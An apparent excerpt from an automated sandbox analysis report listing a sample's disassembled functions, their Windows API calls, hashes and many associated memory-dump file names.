Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ExecuteShell
String ID: explorer$http://seriousbit.com/$open
API String ID: 587946157-1837599659
Opcode ID: d5abdff528ac5e35d7c8f56c577fa7c92a86d4086d6c35a854fdcdaca0f3dc2c
Instruction ID: 204bc61016cbfab3be661aaa313b796d1ea711149c641c23f8607d7057247202
Opcode Fuzzy Hash: d5abdff528ac5e35d7c8f56c577fa7c92a86d4086d6c35a854fdcdaca0f3dc2c
Instruction Fuzzy Hash: 2CC012347C470876E61046516D07F95B6D8C304F52F204196FE0C7D2D254D52400089E

Function 00422DB9 Relevance: 6.2, APIs: 4, Instructions: 174windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00422DEC
GetDesktopWindow.USER32 ref: 00422DFC
GetWindowRect.USER32(?,?), ref: 00422E15
GetWindowRect.USER32(?,?), ref: 00422E21

Part of subcall function 00408BEE: __CxxThrowException@8.LIBCMT ref: 00408C04
Part of subcall function 00408BEE: __EH_prolog3.LIBCMT ref: 00408C11

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Window$Rect$DesktopException@8H_prolog3ThrowVisible
String ID:
API String ID: 584671360-0
Opcode ID: 0f171f7ec6a93cacf2e858741e63054a28e1be163e47e693aae76cc71e6a2c1e
Instruction ID: f44cb8aeee04671f449c14b218bf3aa7a05d8c62293968533175308121bafdfa
Opcode Fuzzy Hash: 0f171f7ec6a93cacf2e858741e63054a28e1be163e47e693aae76cc71e6a2c1e
Instruction Fuzzy Hash: 80511CB5A0011AEFCB00DFE8DA84CAEB7B9FF48304B154459F516E7250C774AE41DB64

Function 00469350 Relevance: 6.2, APIs: 4, Instructions: 169memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004693A1

Part of subcall function 00468FC0: _DebugHeapAllocator.LIBCPMTD ref: 00469006
Part of subcall function 00468FC0: FindFirstFileW.KERNEL32(00000000,?,?,87E7D08C), ref: 00469053
Part of subcall function 00468FC0: _DebugHeapAllocator.LIBCPMTD ref: 004690B2
Part of subcall function 00468FC0: _DebugHeapAllocator.LIBCPMTD ref: 004690F7

_DebugHeapAllocator.LIBCPMTD ref: 00469409
_DebugHeapAllocator.LIBCPMTD ref: 0046948E
_DebugHeapAllocator.LIBCPMTD ref: 004694FA

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: AllocatorDebugHeap$FileFindFirst
String ID:
API String ID: 1000852894-0
Opcode ID: 39a623cdcc5b61da2038604a152a9d18b0d1ce3c032f4ca03467f5af26f6bdea
Instruction ID: d4f7914d44c26e3234bcaff78db0a5657ab7e7fb585a3371fd1c1c3215a147e4
Opcode Fuzzy Hash: 39a623cdcc5b61da2038604a152a9d18b0d1ce3c032f4ca03467f5af26f6bdea
Instruction Fuzzy Hash: 42715A71900108EBCB04EFD5D991AEDBBB9BF14308F10412EF416BB291EB786E49CB59

Function 0043613B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043616F
__isleadbyte_l.LIBCMT ref: 004361A3
MultiByteToWideChar.KERNEL32(00000080,00000009,004280A9,?,00000000,00000000,?,?,?,?,004280A9), ref: 004361D4
MultiByteToWideChar.KERNEL32(00000080,00000009,004280A9,00000001,00000000,00000000,?,?,?,?,004280A9), ref: 00436242

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6d21bd3f32611ac46a12478898fe190ec0879128bfcd62169295a70cbcec05dd
Instruction ID: cc3c986af5b069a7e5118850a3f67147988d85c911ca8b6080fb93a60870eae0
Opcode Fuzzy Hash: 6d21bd3f32611ac46a12478898fe190ec0879128bfcd62169295a70cbcec05dd
Instruction Fuzzy Hash: F531CC31A00247FFDF20DF64C8809AB3BA4EF09310F16D5AAE8618B292D734DD40DB59

Function 00449400 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(80000000,00000001,?,00000104), ref: 0044944C
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 004494A6

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: EnumOpen
String ID:
API String ID: 3231578192-0
Opcode ID: f38fc5c50cda43680ee76d5196c36c42ddd8363e7761a595ab10b68201c00c04
Instruction ID: b00b4359048c38c42a4b430cb7a0b034ffcefb07066237849a5c8ac6135497fa
Opcode Fuzzy Hash: f38fc5c50cda43680ee76d5196c36c42ddd8363e7761a595ab10b68201c00c04
Instruction Fuzzy Hash: 71318471B0431CABEB24CB54CC85FEAB3B4EB09700F104099E20AB6581DAB45E84DF66

Function 00466A30 Relevance: 6.1, APIs: 4, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

GlobalUnlock.KERNEL32(?), ref: 00466A71
GlobalFree.KERNEL32(?), ref: 00466A7E
DeleteObject.GDI32(00000000), ref: 00466AB2
DeleteObject.GDI32(00000000), ref: 00466AC8

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: DeleteGlobalObject$FreeUnlock
String ID:
API String ID: 4142418270-0
Opcode ID: f00a0c78ae3ac07c778321153d537e412def38a855120628d98113e15cf2b72f
Instruction ID: 269f5bcea3d1a643ddb3c618c168cc533852f3295bd9db834820fdc8ab9f50c9
Opcode Fuzzy Hash: f00a0c78ae3ac07c778321153d537e412def38a855120628d98113e15cf2b72f
Instruction Fuzzy Hash: 44414FB8E00108ABDB04CF95C598B9AFBB5FB48308F21C19AD8156B351D776EA46CB85

Function 00424181 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 0042421C

Part of subcall function 00413A6C: GetWindow.USER32(?,?), ref: 00413A78

GetParent.USER32(?), ref: 004241A4
GetWindowLongW.USER32(?,000000EC), ref: 004241DE
IsWindowVisible.USER32(?), ref: 004241F7

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
